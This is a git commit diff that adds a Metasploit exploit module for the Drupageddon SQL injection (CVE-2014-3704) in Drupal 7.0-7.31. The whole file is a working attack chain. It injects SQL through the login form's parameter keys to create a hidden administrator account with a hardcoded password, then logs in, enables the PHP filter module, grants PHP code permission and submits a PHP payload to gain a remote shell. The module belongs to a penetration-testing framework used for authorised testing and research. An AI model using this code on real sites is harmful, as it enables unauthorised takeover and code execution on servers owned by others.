update the drupal module a bit with error checking

bperry-zos · bperry-zos · commit 5c4ac48db710 · 2014-10-16T10:32:39.000-07:00
diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb
@@ -0,0 +1,341 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal HTTP Parameter Key/Value SQL Injection',
+      'Description'    => %q{
+	This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
+	(aka Drupageddon) in order to achieve a remote shell on the vulnerable
+	instance. This module was tested against Drupal 7.0 and 7.31 (was fixed
+	in 7.32).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'SektionEins',          # discovery
+          'Christian Mehlmauer',  # msf module
+          'Brandon Perry'         # msf module
+        ],
+      'References'     =>
+        [
+	  ['CVE', '2014-3704']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Drupal 7.0 - 7.31',{}]],
+      'DisclosureDate' => 'Oct 15 2014',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
+    ], self.class)
+
+    register_advanced_options(
+    [
+      OptString.new('ADMIN_ROLE', [ true, "The administrator role", 'administrator'])
+    ], self.class)
+  end
+
+  def uri_path
+    normalize_uri(target_uri.path)
+  end
+
+  def admin_role
+    datastore['ADMIN_ROLE']
+  end
+
+  def generate_password_hash(pass)
+    # Syntax for MD5:
+    # $P$ = MD5
+    # one char representing the hash iterations (min 7 iterations)
+    # 8 chars salt
+    # MD5_raw(salt.pass) + iterations
+    # MD5 base64 encoded and trimmed to 22 chars for md5
+
+    # VALID md5 for salt 12345678 and password test
+    #$P$812345678BWHQIqn5fZNJ.YWj7Kb39.
+
+    pass = 'test'
+    iter = 10
+    iter_char_base = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
+    iter_char = iter_char_base[iter]
+    #salt = Rex::Text.rand_text_alpha(8)
+    salt = '12345678'
+    md5 = Rex::Text.md5_raw("#{salt}#{pass}")
+    1.upto(iter) {
+      md5 = Rex::Text.md5_raw("#{md5}#{pass}")
+    }
+    md5_base64 = Rex::Text.encode_base64(md5)
+    md5_stripped = md5_base64[0...22]
+    pass = "$P$#{iter_char}#{salt}#{md5_stripped}"
+    #puts pass
+
+    # return hardcoded password test for now
+    return '$S$D7hqYeEHohfN2JLg7L4JBa8P3HBX8vimkIehutyb3BptkWMMON/d'
+  end
+
+  def sql_insert_user(user, pass)
+    "insert into users (uid, name, pass, mail, status) select max(uid)+1, '#{user}', '#{(generate_password_hash(pass))}', '#{Rex::Text.rand_text_alpha_lower(5)}@#{Rex::Text.rand_text_alpha_lower(5)}.#{Rex::Text.rand_text_alpha_lower(3)}', 1 from users"
+  end
+
+  def sql_make_user_admin(user)
+    "insert into users_roles (uid, rid) VALUES ((select uid from users where name='#{user}'), (select rid from role where name = '#{admin_role}'));"
+  end
+
+  def extract_form_ids(content)
+    form_build_id = $1 if content =~ /name="form_build_id" value="(.+)" \/>/
+    form_token = $1 if content =~ /name="form_token" value="(.+)" \/>/
+
+    unless form_token and form_build_id
+      fail_with(Failure::Unknown, "Could not parse form tokens")
+    end
+
+    vprint_debug("#{peer} - form_build_id: #{form_build_id}")
+    vprint_debug("#{peer} - form_token: #{form_token}")
+
+    return form_build_id, form_token
+  end
+
+  def exploit
+
+    # TODO: Password hashing function
+    # TODO: Check returns from regex matches, fail if nil
+    # TODO: Check if option admin_role exists via admin/people/permissions/roles
+
+    # call login page to extract tokens
+    print_status("#{peer} - Testing page")
+    res = send_request_cgi({
+      'uri' => uri_path,
+      'vars_get' => {
+        'q' => 'user/login'
+      }
+    })
+
+    unless res and res.body
+      fail_with(Failure::Unknown, "No response or response body, bailing.")
+    end
+
+    form_build_id, form_token = extract_form_ids(res.body)
+
+    if form_build_id == nil or form_build_id == ""
+      fail_with(Failure::Unknown, "Could not retrieve form_build_id")
+    end
+
+    user = Rex::Text.rand_text_alpha(10)
+    #pass = Rex::Text.rand_text_alpha(10)
+    # TODO: hardcoded for now
+    pass = 'test'
+
+    post = {
+      "name[0 ;#{sql_insert_user(user, pass)}; #{sql_make_user_admin(user)}; # ]" => Rex::Text.rand_text_alpha(10),
+      'name[0]' => Rex::Text.rand_text_alpha(10),
+      'pass' => Rex::Text.rand_text_alpha(10),
+      'form_build_id' => form_build_id,
+      'form_id' => 'user_login',
+      'op' => 'Log in'
+    }
+
+    print_status("#{peer} - Creating new user #{user}:#{pass}")
+    res = send_request_cgi({
+      'uri' => uri_path,
+      'method' => 'POST',
+      'vars_post' => post,
+      'vars_get' => {
+        'q' => 'user/login'
+      }
+    })
+
+    unless res and res.body
+      fail_with(Failure::Unknown, "No response or response body, bailing.")
+    end
+
+    # login
+    print_status("#{peer} - Logging in as #{user}:#{pass}")
+    res = send_request_cgi({
+      'uri' => uri_path,
+      'method' => 'POST',
+      'vars_post' => {
+        'name' => user,
+        'pass' => pass,
+        'form_build_id' => form_build_id,
+        'form_id' => 'user_login',
+        'op' => 'Log in'
+      },
+      'vars_get' => {
+        'q' => 'user/login'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, "No response or response body, bailing.")
+    end
+
+    cookie = res.get_cookies
+    vprint_debug("#{peer} - cookie: #{cookie}")
+
+    # call admin interface to extract CSRF token and enabled modules
+    print_status("#{peer} - Trying to parse enabled modules")
+    res = send_request_cgi({
+      'uri' => uri_path,
+      'vars_get' => {
+        'q' => 'admin/modules'
+      },
+      'cookie' => cookie
+    })
+
+    form_build_id, form_token = extract_form_ids(res.body)
+
+    enabled_module_regex = /name="(.+)" value="1" checked="checked" class="form-checkbox"/
+    enabled_matches = res.body.to_enum(:scan, enabled_module_regex).map { Regexp.last_match }
+
+
+    unless enabled_matches
+      fail_with(Failure::Unknown, "No modules enabled is incorrect, bailing.")
+    end
+
+    post = {
+      'modules[Core][php][enable]' => '1',
+      'form_build_id' => form_build_id,
+      'form_token' => form_token,
+      'form_id' => 'system_modules',
+      'op' => 'Save configuration'
+    }
+
+    enabled_matches.each do |match|
+      post[match.captures[0]] = '1'
+    end
+
+    # enable PHP filter
+    print_status("#{peer} - Enabling the PHP filter module")
+    res = send_request_cgi({
+      'uri' => uri_path,
+      'method' => 'POST',
+      'vars_post' => post,
+      'vars_get' => {
+        'q' => 'admin/modules/list/confirm'
+      },
+      'cookie' => cookie
+    })
+
+    unless res and res.body
+      fail_with(Failure::Unknown, "No response or response body, bailing.")
+    end
+
+    # Response: http 302, Location: http://10.211.55.50/?q=admin/modules
+
+    print_status("#{peer} - Setting permissions for PHP filter module")
+
+    # allow admin to use php_code
+    res = send_request_cgi({
+      'uri' => uri_path,
+      'vars_get' => {
+        'q' => 'admin/people/permissions'
+      },
+      'cookie' => cookie
+    })
+
+
+    unless res and res.body
+      fail_with(Failure::Unknown, "No response or response body, bailing.")
+    end
+
+    form_build_id, form_token = extract_form_ids(res.body)
+
+    perm_regex = /name="(.+)" value="(.+)" checked="checked" \/>/
+    enabled_perms = res.body.to_enum(:scan, perm_regex).map { Regexp.last_match }
+
+    unless enabled_perms
+      fail_with(Failure::Unknown, "No enabled permissions were able to be parsed, bailing.")
+    end
+
+    # get administrator role id
+    id = $1 if res.body =~ /for="edit-([0-9]+)-administer-content-types">#{admin_role}:/
+    vprint_debug("#{peer} - admin role id: #{id}")
+
+    unless id
+      fail_with(Failure::Unknown, "Could not parse out administrator ID")
+    end
+
+    post = {
+      "#{id}[use text format php_code]" => 'use text format php_code',
+      'form_build_id' => form_build_id,
+      'form_token' => form_token,
+      'form_id' => 'user_admin_permissions',
+      'op' => 'Save permissions'
+    }
+
+    enabled_perms.each do |match|
+      post[match.captures[0]] = match.captures[1]
+    end
+
+    res = send_request_cgi({
+      'uri' => uri_path,
+      'method' => 'POST',
+      'vars_post' => post,
+      'vars_get' => {
+        'q' => 'admin/people/permissions'
+      },
+      'cookie' => cookie
+    })
+
+    unless res and res.body
+      fail_with(Failure::Unknown, "No response or response body, bailing.")
+    end
+
+    # Add new Content page (extract csrf token)
+    print_status("#{peer} - Getting tokens from create new article page")
+    res = send_request_cgi({
+      'uri' => uri_path,
+      'vars_get' => {
+        'q' => 'node/add/article'
+      },
+      'cookie' => cookie
+    })
+
+    unless res and res.body
+      fail_with(Failure::Unknown, "No response or response body, bailing.")
+    end
+
+    form_build_id, form_token = extract_form_ids(res.body)
+
+    # Preview to trigger the payload
+    data = Rex::MIME::Message.new
+    data.add_part(Rex::Text.rand_text_alpha(10), nil, nil, 'form-data; name="title"')
+    data.add_part(form_build_id, nil, nil, 'form-data; name="form_build_id"')
+    data.add_part(form_token, nil, nil, 'form-data; name="form_token"')
+    data.add_part('article_node_form', nil, nil, 'form-data; name="form_id"')
+    data.add_part('php_code', nil, nil, 'form-data; name="body[und][0][format]"')
+    data.add_part("<?php #{payload.encoded} ?>", nil, nil, 'form-data; name="body[und][0][value]"')
+    data.add_part('Preview', nil, nil, 'form-data; name="op"')
+    data.add_part(user, nil, nil, 'form-data; name="name"')
+    data.add_part('1', nil, nil, 'form-data; name="status"')
+    data.add_part('1', nil, nil, 'form-data; name="promote"')
+    post_data = data.to_s
+
+    print_status("#{peer} - Calling preview page. Exploit should trigger...")
+    send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => uri_path,
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => post_data,
+      'vars_get' => {
+        'q' => 'node/add/article'
+      },
+      'cookie' => cookie
+    )
+  end
+end
+
